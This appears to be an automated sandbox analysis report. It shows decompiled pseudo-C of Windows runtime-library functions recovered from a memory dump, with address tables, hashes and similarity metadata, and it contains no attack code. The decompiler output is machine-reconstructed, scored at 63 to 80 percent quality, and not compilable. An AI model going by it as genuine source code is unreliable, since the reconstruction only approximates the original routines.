                                                                  0x0496fbd3
                                                                  0x0496fbd9
                                                                  0x0496fbdc
                                                                  0x0496fbde
                                                                  0x0496fc99
                                                                  0x0496fc9b
                                                                  0x0496fc9d
                                                                  0x0496fcd5
                                                                  0x0496fcd5
                                                                  0x0496fc89
                                                                  0x0496fc89
                                                                  0x00000000
                                                                  0x0496fc9f
                                                                  0x0496fc9f
                                                                  0x0496fca3
                                                                  0x00000000
                                                                  0x0496fca3
                                                                  0x00000000
                                                                  0x0496fbe4
                                                                  0x0496fbe4
                                                                  0x0496fbe4
                                                                  0x0496fbe4
                                                                  0x0496fbe9
                                                                  0x0496fbf2
                                                                  0x00000000
                                                                  0x0496fbf2
                                                                  0x0496fbde
                                                                  0x0496fbcb
                                                                  0x0496fbab
                                                                  0x0496fc8b
                                                                  0x0496fc8b
                                                                  0x0496fc8c
                                                                  0x0496fb80
                                                                  0x0496fb72
                                                                  0x0496fb5e
                                                                  0x0496fc8d
                                                                  0x0496fc91
                                                                  0x0496fadf
                                                                  0x0496fadf
                                                                  0x0496fae1
                                                                  0x0496fae4
                                                                  0x0496fae7
                                                                  0x0496faec
                                                                  0x0496faf8
                                                                  0x0496fb00
                                                                  0x0496fb07
                                                                  0x0496fb0f
                                                                  0x0496fb0f
                                                                  0x0496fb07
                                                                  0x00000000
                                                                  0x0496faf8
                                                                  0x0496fadd

                                                                  Strings
                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 049ABE0F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                  • API String ID: 0-865735534
                                                                  • Opcode ID: 2247990efcbd70f6bd83eede36acf8ce2ad52fb5c9d071c844f0621e4332f8fc
                                                                  • Instruction ID: 13aff3e7802985c1c82354adc63550eb99d886f92178e8bfbf00d2ad9872f0c4
                                                                  • Opcode Fuzzy Hash: 2247990efcbd70f6bd83eede36acf8ce2ad52fb5c9d071c844f0621e4332f8fc
                                                                  • Instruction Fuzzy Hash: 22A10471B006068FEB25DF68D454B7AB7A9EF84714F144979E907DB688EB38F901CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04932D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 63%
                                                                  			E04932D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4a25350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4a27bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E049797C0();
				}
				if( *0x4a279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4a279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04961624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04957D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E049CFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04979520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0496E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0498DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4a26901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4a26901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04979980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E049795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04957D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04957D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E049B7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E049CFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4a25350;
							if(_t109 != 0x4a25350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E049CFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E049C5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                  0x04932d8a
                                                                  0x04932d8a
                                                                  0x04932d92
                                                                  0x04932d96
                                                                  0x04932d9e
                                                                  0x04932da0
                                                                  0x04932da3
                                                                  0x04932da5
                                                                  0x04932da8
                                                                  0x04932dab
                                                                  0x04932db2
                                                                  0x0498f9aa
                                                                  0x0498f9ab
                                                                  0x0498f9ae
                                                                  0x0498f9ae
                                                                  0x04932db8
                                                                  0x04932dc2
                                                                  0x0498f9b9
                                                                  0x0498f9be
                                                                  0x0498f9bf
                                                                  0x0498f9bf
                                                                  0x04932dcf
                                                                  0x0498f9c9
                                                                  0x04932dd5
                                                                  0x04932dd5
                                                                  0x04932dd5
                                                                  0x04932dde
                                                                  0x04932de1
                                                                  0x04932e70
                                                                  0x04932e72
                                                                  0x04932e72
                                                                  0x04932de7
                                                                  0x04932deb
                                                                  0x04932e7c
                                                                  0x04932e83
                                                                  0x04932e85
                                                                  0x04932e8b
                                                                  0x04932e8d
                                                                  0x04932e92
                                                                  0x04932e92
                                                                  0x04932e85
                                                                  0x04932df1
                                                                  0x04932df7
                                                                  0x04932df9
                                                                  0x04932df9
                                                                  0x04932dfc
                                                                  0x04932dff
                                                                  0x04932e02
                                                                  0x00000000
                                                                  0x04932e05
                                                                  0x04932e0c
                                                                  0x0498f9d9
                                                                  0x04932e12
                                                                  0x04932e12
                                                                  0x04932e12
                                                                  0x04932e1a
                                                                  0x0498f9e3
                                                                  0x0498f9e9
                                                                  0x0498f9f0
                                                                  0x0498f9f6
                                                                  0x0498f9f8
                                                                  0x0498f9f8
                                                                  0x0498f9f0
                                                                  0x04932e23
                                                                  0x0498fa02
                                                                  0x0498fa03
                                                                  0x0498fa05
                                                                  0x0498fa06
                                                                  0x00000000
                                                                  0x04932e29
                                                                  0x04932e29
                                                                  0x04932e2e
                                                                  0x04932e34
                                                                  0x04932e3e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04932e44
                                                                  0x04932e47
                                                                  0x04932e4d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04932e4f
                                                                  0x04932e54
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04932e5a
                                                                  0x04932e5f
                                                                  0x04932e9a
                                                                  0x04932ea4
                                                                  0x04932ea5
                                                                  0x04932ea8
                                                                  0x04932eaf
                                                                  0x04932eb2
                                                                  0x04932eb5
                                                                  0x0498fae9
                                                                  0x0498faeb
                                                                  0x0498faed
                                                                  0x0498faef
                                                                  0x0498faf7
                                                                  0x0498faf8
                                                                  0x0498fafd
                                                                  0x0498faff
                                                                  0x0498fb04
                                                                  0x0498fb04
                                                                  0x0498faff
                                                                  0x04932ec0
                                                                  0x04932ec4
                                                                  0x04932ec6
                                                                  0x04932ec8
                                                                  0x0498fb14
                                                                  0x0498fb18
                                                                  0x0498fb1e
                                                                  0x0498fb21
                                                                  0x0498fb21
                                                                  0x04932ece
                                                                  0x04932ece
                                                                  0x04932ece
                                                                  0x04932ed7
                                                                  0x04932e61
                                                                  0x04932e63
                                                                  0x0498fa6b
                                                                  0x0498fa71
                                                                  0x0498fa76
                                                                  0x0498fa78
                                                                  0x0498fa8a
                                                                  0x0498fa7a
                                                                  0x0498fa83
                                                                  0x0498fa83
                                                                  0x0498fa8f
                                                                  0x0498fa91
                                                                  0x0498fa97
                                                                  0x0498fa9d
                                                                  0x0498faa4
                                                                  0x0498faaa
                                                                  0x0498faaf
                                                                  0x0498fab1
                                                                  0x0498fac3
                                                                  0x0498fab3
                                                                  0x0498fabc
                                                                  0x0498fabc
                                                                  0x0498fac8
                                                                  0x0498facb
                                                                  0x0498fadf
                                                                  0x0498fadf
                                                                  0x0498facb
                                                                  0x0498faa4
                                                                  0x0498fa91
                                                                  0x04932e6f
                                                                  0x04932e6f
                                                                  0x04932e5f
                                                                  0x0498fa13
                                                                  0x0498fa15
                                                                  0x0498fa17
                                                                  0x0498fa1f
                                                                  0x0498fa21
                                                                  0x0498fa22
                                                                  0x0498fa25
                                                                  0x0498fa28
                                                                  0x0498fa2f
                                                                  0x0498fa2f
                                                                  0x0498fa2a
                                                                  0x0498fa2a
                                                                  0x0498fa2a
                                                                  0x0498fa31
                                                                  0x0498fa34
                                                                  0x0498fa36
                                                                  0x0498fa3c
                                                                  0x0498fa3e
                                                                  0x0498fa41
                                                                  0x0498fa43
                                                                  0x0498fa45
                                                                  0x0498fa45
                                                                  0x0498fa41
                                                                  0x0498fa3c
                                                                  0x0498fa4a
                                                                  0x0498fa4f
                                                                  0x0498fa51
                                                                  0x0498fa53
                                                                  0x0498fa56
                                                                  0x0498fa5b
                                                                  0x0498fa5e
                                                                  0x00000000
                                                                  0x0498fa5e
                                                                  0x04932e23

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Re-Waiting
                                                                  • API String ID: 0-316354757
                                                                  • Opcode ID: 25150b43d4a842798a4549da5f79ecc7a3bb2a10e2cb82703db92a298869eafb
                                                                  • Instruction ID: b4c5353843e8a7c150f9c8db689421a32efa59ded52f4fd29d3549e7234e5914
                                                                  • Opcode Fuzzy Hash: 25150b43d4a842798a4549da5f79ecc7a3bb2a10e2cb82703db92a298869eafb
                                                                  • Instruction Fuzzy Hash: 05610431B00604AFEB31EF6CC845B7EB7AAEB85728F1406BDD811972C0E734B9419791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A00EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 80%
                                                                  			E04A00EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E049FFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04A01074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04979730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E049FA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E049FA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4a28b04 >> 0x14) + (_v44 -  *0x4a28b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04957D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E049F138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04957D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E049EFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4a28724 & 0x00000008) != 0) {
						E049F52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04A015B5(0x4a28ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                  0x04a00eb7
                                                                  0x04a00eb9
                                                                  0x04a00ec0
                                                                  0x04a00ec2
                                                                  0x04a00ecd
                                                                  0x04a0105b
                                                                  0x04a0105b
                                                                  0x04a01061
                                                                  0x04a01066
                                                                  0x04a01066
                                                                  0x04a0106b
                                                                  0x04a01073
                                                                  0x04a01073
                                                                  0x04a00ed3
                                                                  0x04a00ed6
                                                                  0x04a00edc
                                                                  0x04a00ee0
                                                                  0x04a00ee7
                                                                  0x04a00ef0
                                                                  0x04a00ef5
                                                                  0x04a00efa
                                                                  0x04a00efc
                                                                  0x04a00efd
                                                                  0x04a00f03
                                                                  0x04a00f04
                                                                  0x04a00f06
                                                                  0x04a00f07
                                                                  0x04a00f09
                                                                  0x04a00f0e
                                                                  0x04a00f14
                                                                  0x04a00f23
                                                                  0x04a00f2d
                                                                  0x04a00f34
                                                                  0x04a00f34
                                                                  0x04a00f14
                                                                  0x04a00f52
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a00f58
                                                                  0x04a00f73
                                                                  0x04a00f74
                                                                  0x04a00f79
                                                                  0x04a00f7d
                                                                  0x04a00f80
                                                                  0x04a00f86
                                                                  0x04a00fab
                                                                  0x04a00fb5
                                                                  0x04a00fc6
                                                                  0x04a00fd1
                                                                  0x04a00fe3
                                                                  0x04a00fd3
                                                                  0x04a00fdc
                                                                  0x04a00fdc
                                                                  0x04a00feb
                                                                  0x04a01009
                                                                  0x04a01009
                                                                  0x04a01015
                                                                  0x04a01027
                                                                  0x04a01017
                                                                  0x04a01020
                                                                  0x04a01020
                                                                  0x04a0102f
                                                                  0x04a0103c
                                                                  0x04a0103c
                                                                  0x04a01048
                                                                  0x04a01050
                                                                  0x04a01050
                                                                  0x04a01055
                                                                  0x00000000
                                                                  0x04a01055
                                                                  0x04a00f88
                                                                  0x04a00f9e
                                                                  0x04a00fa2
                                                                  0x04a00fa9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a00fa9
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `
                                                                  • API String ID: 0-2679148245
                                                                  • Opcode ID: 9afc0ab57365b10f0f00abc953a32533cfc821e1f43f098eecdd15bd8e8bd780
                                                                  • Instruction ID: 4134857f2a7a3ea40b60184d928d445a1b93eada5b6760ea8cfefedfa65d6b0c
                                                                  • Opcode Fuzzy Hash: 9afc0ab57365b10f0f00abc953a32533cfc821e1f43f098eecdd15bd8e8bd780
                                                                  • Instruction Fuzzy Hash: B151BF712083819FE325DF28E980B6BB7E5EBC4318F048A2DF986972D0D675F905C762
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E0496F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04954120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04979830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04979990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E049795D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x291cd81a
							_t109 = L04954620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000291c
								E0497F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000291c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E049795D0();
										L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                  0x0496f0d3
                                                                  0x0496f0d9
                                                                  0x0496f0e0
                                                                  0x0496f0e7
                                                                  0x0496f0f2
                                                                  0x0496f0f4
                                                                  0x0496f0f8
                                                                  0x0496f100
                                                                  0x0496f108
                                                                  0x0496f10d
                                                                  0x0496f115
                                                                  0x0496f116
                                                                  0x0496f11f
                                                                  0x0496f123
                                                                  0x0496f124
                                                                  0x0496f12c
                                                                  0x0496f130
                                                                  0x0496f134
                                                                  0x0496f13d
                                                                  0x0496f144
                                                                  0x0496f14b
                                                                  0x0496f152
                                                                  0x049abab0
                                                                  0x049abab0
                                                                  0x0496f158
                                                                  0x0496f158
                                                                  0x0496f15a
                                                                  0x0496f160
                                                                  0x0496f165
                                                                  0x0496f166
                                                                  0x0496f16f
                                                                  0x0496f173
                                                                  0x049abaa7
                                                                  0x049abaa7
                                                                  0x049abaab
                                                                  0x00000000
                                                                  0x0496f179
                                                                  0x0496f179
                                                                  0x0496f18d
                                                                  0x0496f191
                                                                  0x049abaa2
                                                                  0x00000000
                                                                  0x0496f197
                                                                  0x0496f19b
                                                                  0x0496f1a2
                                                                  0x0496f1a9
                                                                  0x0496f1af
                                                                  0x0496f1b2
                                                                  0x0496f1b6
                                                                  0x0496f1b9
                                                                  0x0496f1c0
                                                                  0x0496f1c4
                                                                  0x0496f1d8
                                                                  0x0496f1df
                                                                  0x0496f1e3
                                                                  0x0496f1e6
                                                                  0x0496f1eb
                                                                  0x0496f1ee
                                                                  0x0496f1f4
                                                                  0x0496f20f
                                                                  0x049abab7
                                                                  0x049ababb
                                                                  0x049abacc
                                                                  0x049abad1
                                                                  0x0496f215
                                                                  0x0496f218
                                                                  0x0496f226
                                                                  0x0496f22b
                                                                  0x00000000
                                                                  0x0496f22b
                                                                  0x0496f1f6
                                                                  0x0496f1f6
                                                                  0x0496f1f9
                                                                  0x0496f1fb
                                                                  0x0496f1fb
                                                                  0x0496f1f4
                                                                  0x0496f191
                                                                  0x0496f173
                                                                  0x0496f152
                                                                  0x0496f203

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction ID: 5dd45b1c9be99ee38d45f16eb9272da3c4534372f38fdec1e9d15d1eba187875
                                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction Fuzzy Hash: 1C519C712047109FD320DF29C840A6BBBF9FF88754F10892DF996876A0E7B4E914CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E049B3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4a2d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04970BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E049B3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0497FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E049B3540;
						E0497FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0498DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E049C0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E049797C0();
					}
					return E0497B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E049B3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E049B3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0497FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04979650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E049B3787(_a4,  &_v352, _t80);
						}
					}
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E049795D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                  0x049b3552
                                                                  0x049b355a
                                                                  0x049b355d
                                                                  0x049b3566
                                                                  0x049b3567
                                                                  0x049b357e
                                                                  0x049b358f
                                                                  0x049b35a1
                                                                  0x049b35a5
                                                                  0x049b366b
                                                                  0x049b366b
                                                                  0x049b366d
                                                                  0x049b3672
                                                                  0x049b3679
                                                                  0x049b3685
                                                                  0x049b368d
                                                                  0x049b369d
                                                                  0x049b36a7
                                                                  0x049b36b8
                                                                  0x049b36c6
                                                                  0x049b36c7
                                                                  0x049b36dc
                                                                  0x049b36e1
                                                                  0x049b36e7
                                                                  0x049b36e9
                                                                  0x049b36e9
                                                                  0x049b3703
                                                                  0x049b3703
                                                                  0x049b35b5
                                                                  0x049b35c0
                                                                  0x049b35c4
                                                                  0x00000000
                                                                  0x00000000
